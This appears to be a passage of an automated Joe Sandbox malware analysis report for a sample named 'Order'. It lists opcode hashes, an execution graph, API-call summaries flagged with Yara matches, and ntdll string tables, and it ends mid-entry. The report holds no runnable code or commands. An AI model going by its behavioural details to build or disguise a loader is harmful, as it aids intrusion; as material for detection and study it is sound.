                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cce2d33ae39d6f4c03d568cf818e8b3c11eb356a060cf979e2acf0ad57a5657
                                                                • Instruction ID: 9763870ad4f5ba421353fdbce83b7669868cb9863de542b95cd71b8b27be70ad
                                                                • Opcode Fuzzy Hash: 6cce2d33ae39d6f4c03d568cf818e8b3c11eb356a060cf979e2acf0ad57a5657
                                                                • Instruction Fuzzy Hash: DDA14B36E102198FCF05DFA4C8445DEB7B2FF84304B1595BAE906BB266DB71E916CB80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99538665cb0e39441f01b327506d8d16654cf79d1f7a0f2063610af5a0094de1
                                                                • Instruction ID: 3d282a759f73989f9f5933207d9a95ab9234145134c2385b4f2c861c0d29d639
                                                                • Opcode Fuzzy Hash: 99538665cb0e39441f01b327506d8d16654cf79d1f7a0f2063610af5a0094de1
                                                                • Instruction Fuzzy Hash: D7D1E535D10B5A8ACB10EFA5D854A99F7B2EF95300F20C79AD1097B214EB70AAC5CB91
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a247b24e763675fff6bd58b0dbc1f44ee665596c4a342d69621ad8a3c1bab4aa
                                                                • Instruction ID: 7cf2aff2e55f057cbdddf7b281e6b86f2939b65658b6db4ad8f615864fe88a5f
                                                                • Opcode Fuzzy Hash: a247b24e763675fff6bd58b0dbc1f44ee665596c4a342d69621ad8a3c1bab4aa
                                                                • Instruction Fuzzy Hash: 03511974E102198FDB54CFA9C5806AEFBF6FF89304F2482A9D458AB355DB309941CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e51b736d39a1907b3b980264c8cff20d04a1a8c1fb19c12964d9108fb075ebe9
                                                                • Instruction ID: 1f7147c0331357fe279b9503c975e123e437838a570b72f1da93a4a18b80a660
                                                                • Opcode Fuzzy Hash: e51b736d39a1907b3b980264c8cff20d04a1a8c1fb19c12964d9108fb075ebe9
                                                                • Instruction Fuzzy Hash: 7351D974E042198FDB54CFA9C5806AEBBF3BF89204F2481AAD418AB355D7319D41CFA1

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                Signature Coverage:8.2%
                                                                Total number of Nodes:147
                                                                Total number of Limit Nodes:14
                                                                execution_graph 94780 1a02b60 LdrInitializeThunk 94781 4249e3 94782 4249ff 94781->94782 94783 424a27 94782->94783 94784 424a3b 94782->94784 94785 42c633 NtClose 94783->94785 94791 42c633 94784->94791 94787 424a30 94785->94787 94788 424a44 94794 42e863 RtlAllocateHeap 94788->94794 94790 424a4f 94792 42c64d 94791->94792 94793 42c65e NtClose 94792->94793 94793->94788 94794->94790 94795 42f7e3 94796 42f7f3 94795->94796 94797 42f7f9 94795->94797 94800 42e823 94797->94800 94799 42f81f 94803 42c943 94800->94803 94802 42e83e 94802->94799 94804 42c95d 94803->94804 94805 42c96e RtlAllocateHeap 94804->94805 94805->94802 94922 424d73 94927 424d8c 94922->94927 94923 424e1f 94924 424dd7 94925 42e743 RtlFreeHeap 94924->94925 94926 424de7 94925->94926 94927->94923 94927->94924 94928 424e1a 94927->94928 94929 42e743 RtlFreeHeap 94928->94929 94929->94923 94930 42bc33 94931 42bc4d 94930->94931 94934 1a02df0 LdrInitializeThunk 94931->94934 94932 42bc75 94934->94932 94806 414023 94807 41403d 94806->94807 94812 417793 94807->94812 94809 41405b 94810 4140a0 94809->94810 94811 41408f PostThreadMessageW 94809->94811 94811->94810 94814 4177b7 94812->94814 94813 4177be 94813->94809 94814->94813 94815 4177f3 LdrLoadDll 94814->94815 94816 41780a 94814->94816 94815->94816 94816->94809 94817 41b2c3 94818 41b307 94817->94818 94819 42c633 NtClose 94818->94819 94820 41b328 94818->94820 94819->94820 94821 413ac3 94822 413adf 94821->94822 94825 42c8b3 94822->94825 94826 42c8cd 94825->94826 94829 1a02c70 LdrInitializeThunk 94826->94829 94827 413ae5 94829->94827 94935 41a573 94936 41a5e5 94935->94936 94937 41a58b 94935->94937 94937->94936 94939 41e4c3 94937->94939 94940 41e4e9 94939->94940 94946 41e5e9 94940->94946 94948 42f913 94940->94948 94942 41e57e 94943 41e5e0 94942->94943 94944 42bc83 LdrInitializeThunk 94942->94944 94942->94946 94943->94946 94954 4289f3 94943->94954 94944->94943 94946->94936 94947 41e69b 94947->94936 94949 42f883 
94948->94949 94950 42f8e0 94949->94950 94951 42e823 RtlAllocateHeap 94949->94951 94950->94942 94952 42f8bd 94951->94952 94953 42e743 RtlFreeHeap 94952->94953 94953->94950 94955 428a58 94954->94955 94956 428a93 94955->94956 94959 418b63 94955->94959 94956->94947 94958 428a75 94958->94947 94960 418b42 94959->94960 94961 418b72 94959->94961 94962 42c9e3 ExitProcess 94960->94962 94963 418b4b 94962->94963 94963->94958 94830 401b24 94831 401b47 94830->94831 94831->94831 94834 42fcb3 94831->94834 94837 42e2b3 94834->94837 94838 42e2f6 94837->94838 94849 407283 94838->94849 94840 42e30c 94848 401bf8 94840->94848 94852 41b0d3 94840->94852 94842 42e32b 94843 42e340 94842->94843 94867 42c9e3 94842->94867 94863 428303 94843->94863 94846 42e35a 94847 42c9e3 ExitProcess 94846->94847 94847->94848 94851 407290 94849->94851 94870 4164a3 94849->94870 94851->94840 94853 41b0ff 94852->94853 94894 41afc3 94853->94894 94856 41b144 94858 41b160 94856->94858 94861 42c633 NtClose 94856->94861 94857 41b12c 94859 41b137 94857->94859 94860 42c633 NtClose 94857->94860 94858->94842 94859->94842 94860->94859 94862 41b156 94861->94862 94862->94842 94864 428365 94863->94864 94866 428372 94864->94866 94905 418613 94864->94905 94866->94846 94868 42c9fd 94867->94868 94869 42ca0e ExitProcess 94868->94869 94869->94843 94871 4164c0 94870->94871 94873 4164d9 94871->94873 94874 42d083 94871->94874 94873->94851 94876 42d09d 94874->94876 94875 42d0cc 94875->94873 94876->94875 94881 42bc83 94876->94881 94882 42bc9d 94881->94882 94888 1a02c0a 94882->94888 94883 42bcc9 94885 42e743 94883->94885 94891 42c993 94885->94891 94887 42d145 94887->94873 94889 1a02c11 94888->94889 94890 1a02c1f LdrInitializeThunk 94888->94890 94889->94883 94890->94883 94892 42c9ad 94891->94892 94893 42c9be RtlFreeHeap 94892->94893 94893->94887 94895 41b0b9 94894->94895 94896 41afdd 94894->94896 94895->94856 94895->94857 94900 42bd23 94896->94900 94899 42c633 NtClose 94899->94895 94901 42bd40 94900->94901 94904 1a035c0 
LdrInitializeThunk 94901->94904 94902 41b0ad 94902->94899 94904->94902 94907 41863d 94905->94907 94906 418b4b 94906->94866 94907->94906 94913 413ca3 94907->94913 94909 41876a 94909->94906 94910 42e743 RtlFreeHeap 94909->94910 94911 418782 94910->94911 94911->94906 94912 42c9e3 ExitProcess 94911->94912 94912->94906 94915 413cc3 94913->94915 94917 413d2c 94915->94917 94918 41b3e3 RtlFreeHeap LdrInitializeThunk 94915->94918 94916 413d22 94916->94909 94917->94909 94918->94916 94919 418d68 94920 42c633 NtClose 94919->94920 94921 418d72 94920->94921

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                                • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
                                                                • Instruction ID: c83dc4205a9ccc2488157488bce9782db904f394fe0b48f070175f04bc6e7173
                                                                • Opcode Fuzzy Hash: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
                                                                • Instruction Fuzzy Hash: 9F90026224240003410571584414616500A97E1241F56C021E1014590DC62989916225
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
                                                                • Instruction ID: deb40ab89a5b528aba9c3b2524e557e55b7961feaec6c069938ddd173c0741e7
                                                                • Opcode Fuzzy Hash: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
                                                                • Instruction Fuzzy Hash: 8390023224140413D11171584504707100997D1281F96C412A0424558DD75A8A52A221
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
                                                                • Instruction ID: 08c036d7fe9aadb34272fa107234c4482d69658f048fc41578896e15570820e4
                                                                • Opcode Fuzzy Hash: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
                                                                • Instruction Fuzzy Hash: 3D90023224148803D1107158840474A100597D1341F5AC411A4424658DC79989917221
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
                                                                • Instruction ID: 96ba6c4b2d6d3e3d719a8c08a3b791630517078f0efd4811a7bf73b89d405685
                                                                • Opcode Fuzzy Hash: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
                                                                • Instruction Fuzzy Hash: EB90023264550403D10071584514706200597D1241F66C411A0424568DC7998A5166A2

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                                • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                                • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 0-3456940251
                                                                • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                                • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: =eA
                                                                • API String ID: 3298025750-3399696693
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0

                                                                Control-flow Graph

                                                                control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0

                                                                Control-flow Graph

                                                                control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0

                                                                Control-flow Graph

                                                                control_flow_graph 131 1a02c0a-1a02c0f 132 1a02c11-1a02c18 131->132 133 1a02c1f-1a02c26 LdrInitializeThunk 131->133
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                Strings
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354CE
                                                                • corrupted critical section, xrefs: 01A354C2
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01A35543
                                                                • Critical section debug info address, xrefs: 01A3541F, 01A3552E
                                                                • Address of the debug info found in the active list., xrefs: 01A354AE, 01A354FA
                                                                • 8, xrefs: 01A352E3
                                                                • Critical section address., xrefs: 01A35502
                                                                • undeleted critical section in freed memory, xrefs: 01A3542B
                                                                • Critical section address, xrefs: 01A35425, 01A354BC, 01A35534
                                                                • Thread identifier, xrefs: 01A3553A
                                                                • double initialized or corrupted critical section, xrefs: 01A35508
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A3540A, 01A35496, 01A35519
                                                                • Invalid debug info address of this critical section, xrefs: 01A354B6
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354E2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                Strings
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A3261F
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A32602
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A32409
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A325EB
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A32498
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A32624
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A32506
                                                                • @, xrefs: 01A3259B
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A32412
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A324C0
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A322E4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                Strings
                                                                • VerifierDlls, xrefs: 01A48CBD
                                                                • HandleTraces, xrefs: 01A48C8F
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A48A3D
                                                                • VerifierDebug, xrefs: 01A48CA5
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01A48B8F
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A48A67
                                                                • VerifierFlags, xrefs: 01A48C50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
                                                                Strings
                                                                • apphelp.dll, xrefs: 019B6496
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01A19A11, 01A19A3A
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A199ED
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A19A01
                                                                • LdrpInitShimEngine, xrefs: 01A199F4, 01A19A07, 01A19A30
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A19A2A
                                                                Memory Dump Source
